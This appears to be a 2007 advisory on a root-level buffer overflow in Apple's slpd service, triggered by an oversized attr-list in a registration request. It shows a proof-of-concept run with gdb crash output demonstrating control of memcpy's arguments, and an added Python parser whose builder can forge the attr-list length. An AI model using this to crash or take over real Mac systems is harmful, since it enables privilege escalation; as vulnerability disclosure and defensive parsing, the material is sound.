Wednesday, 17 January 2007

Apple SLP Daemon Service Registration Buffer Overflow Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 17-01-07
Description:: slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Apple introduced three new APIs that use Bonjour for service discovery. The new APIs are CFNetServices, NSNetServices and DNSServiceDiscovery. In general, if your application is targeted to run on Mac OS X 10.2 and later, Apple highly recommends that you use the Bonjour APIs directly for your service discovery needs instead of NSL.
/usr/sbin/slpd is the path to the Apple Minimal SLP v2 Service Agent; according to the RFC, this type of agent is "A process working on the behalf of one or more services to advertise the services". The man page provides the following description:
The SLP daemon (Service Location Protocol) advertises local services to the network. It supports registrations from the slp_reg tool as well as NSL (Network Service Location) and the Directory Services SLP plugin.
Remote exploitation seems possible, although it's still being verified.
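A bounds-checked SrvReg parser, added here as a defensive illustration (not code from this advisory or from Apple's slpd): every length prefix, the attr-list included, is checked against the bytes actually received and against a fixed cap before the field is used. The field layout follows RFC 2608; MAX_ATTR_LIST and the build_srvreg helper are assumptions for the demo, since the page does not state slpd's buffer size.

```python
import struct

SLP_VERSION, SLP_SRVREG = 2, 3
MAX_ATTR_LIST = 4096  # assumed cap for the attr-list; slpd's real buffer size is not on the page


class SLPParseError(ValueError):
    pass


def _take(buf, pos, n, what):
    """Return buf[pos:pos+n] only if it lies entirely inside the message."""
    if pos + n > len(buf):
        raise SLPParseError(f"{what}: declared {n} bytes, only {len(buf) - pos} remain")
    return buf[pos:pos + n], pos + n


def _len_prefixed(buf, pos, what):
    """Read a 2-byte big-endian length, then that many bytes, with bounds checks."""
    raw, pos = _take(buf, pos, 2, what + " length")
    return _take(buf, pos, struct.unpack("!H", raw)[0], what)


def parse_srvreg(msg):
    """Parse an SLPv2 SrvReg (RFC 2608 8.3) up to and including the attr-list."""
    if len(msg) < 14 or msg[0] != SLP_VERSION or msg[1] != SLP_SRVREG:
        raise SLPParseError("not an SLPv2 SrvReg")
    if int.from_bytes(msg[2:5], "big") != len(msg):   # 3-byte header length
        raise SLPParseError("header length does not match bytes received")
    lang, pos = _len_prefixed(msg, 12, "lang tag")    # after flags, ext offset, XID
    pos += 3                                          # URL-Entry: reserved(1) + lifetime(2)
    url, pos = _len_prefixed(msg, pos, "URL")
    nauth, pos = _take(msg, pos, 1, "URL auth count")
    if nauth[0]:
        raise SLPParseError("URL auth blocks not handled in this demo")
    srvtype, pos = _len_prefixed(msg, pos, "service type")
    scopes, pos = _len_prefixed(msg, pos, "scope list")
    attrs, pos = _len_prefixed(msg, pos, "attr-list")
    if len(attrs) > MAX_ATTR_LIST:                    # the check a fixed-size copy target needs
        raise SLPParseError(f"attr-list of {len(attrs)} bytes exceeds cap {MAX_ATTR_LIST}")
    return {"lang": lang.decode(), "url": url.decode(), "srvtype": srvtype.decode(),
            "scopes": scopes.decode(), "attrs": attrs.decode()}


def build_srvreg(url, srvtype, scopes, attrs, attr_len_override=None):
    """Constructed SrvReg builder for the demo; attr_len_override forges the attr-list length field."""
    def lp(s, n=None):
        b = s.encode()
        return struct.pack("!H", len(b) if n is None else n) + b
    body = (lp("en") + b"\x00" + struct.pack("!H", 65535) + lp(url) + b"\x00"
            + lp(srvtype) + lp(scopes) + lp(attrs, attr_len_override))
    hdr = bytes([SLP_VERSION, SLP_SRVREG]) + (12 + len(body)).to_bytes(3, "big") + b"\x00" * 5 + b"\x00\x01"
    return hdr + body
```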
Exploit:: The provided proof of concept uses the local socket opened by slpd for sending the payload. Check the source code for more information.
$ ruby MOAB-17-01-2007.rb

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x8edd9eb1
[Switching to process 22158 thread 0x1e03]
0xffff0ac4 in ___memcpy ()
228 in /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h

(gdb) i r
eax 0xffff07a0 -63584
ecx 0xdeadbeed -559038739
edx 0x2 2
ebx 0xffffffff -1
esp 0xb02fdd70 0xb02fdd70
ebp 0xb02fdd78 0xb02fdd78
esi 0x8edd9eb1 -1898078543
edi 0x8ede19a2 -1898047070
eip 0xffff0ac4 0xffff0ac4 <___memcpy+804>
(...)

(gdb) x/12x $esp
0xb02fdd70: 0xb0305ab4 0x00000000 0xb0305ee8 0x0000b9a7
0xb02fdd80: 0xb0305ab3 0xb02fdfc3 0xdeadbeef 0xb0305ec4
0xb02fdd90: 0xb0305ebc 0xb0305eb8 0xb0305ecc 0xb0305ec8

(gdb) x/8x $ebp
0xb02fdd78: 0xb0305ee8 0x0000b9a7 0xb0305ab3 0xb02fdfc3
0xb02fdd88: 0xdeadbeef 0xb0305ec4 0xb0305ebc 0xb0305eb8

(gdb) break *0x0000b9a2
(gdb) r
(...)
(gdb) info breakpoints
Num Type Disp Enb Address What
3 breakpoint keep y 0x0000b9a2
(gdb) x/1x 0xb02fddc5+506
0xb02fdfbf: 0xdeadbeef
(gdb) x/1x 0xb02fddc5
0xb02fddc5: 0x58585858

(gdb) x/6 0xb991
0xb991: mov -32(%ebp),%eax
0xb994: mov %eax,8(%esp)
0xb998: mov -28(%ebp),%eax
0xb99b: mov %eax,4(%esp)
0xb99f: mov %ecx,(%esp)
0xb9a2: call 0x220dc

(gdb) x/1x $ebp-32
0xb0305ec8: 0xdeadbeef
(gdb) x/1x $esp+8
0xb02fdd88: 0xdeadbeef
(gdb) x/1x $ebp-28
0xb0305ecc: 0xb02fdfc3
(gdb) x/1x $esp+4
0xb02fdd84: 0xb02fdfc3
(gdb) x/1x $esp
0xb02fdd80: 0xb0305ab3
Prevention:: Wait for Apple to release a patch. Disable Personal file sharing and ensure slpd isn't running. This issue was reported to Apple on 8/2/06 5:31 PM.
Links::
MOAB-17-01-2007.rb
MOAB-17-01-2007
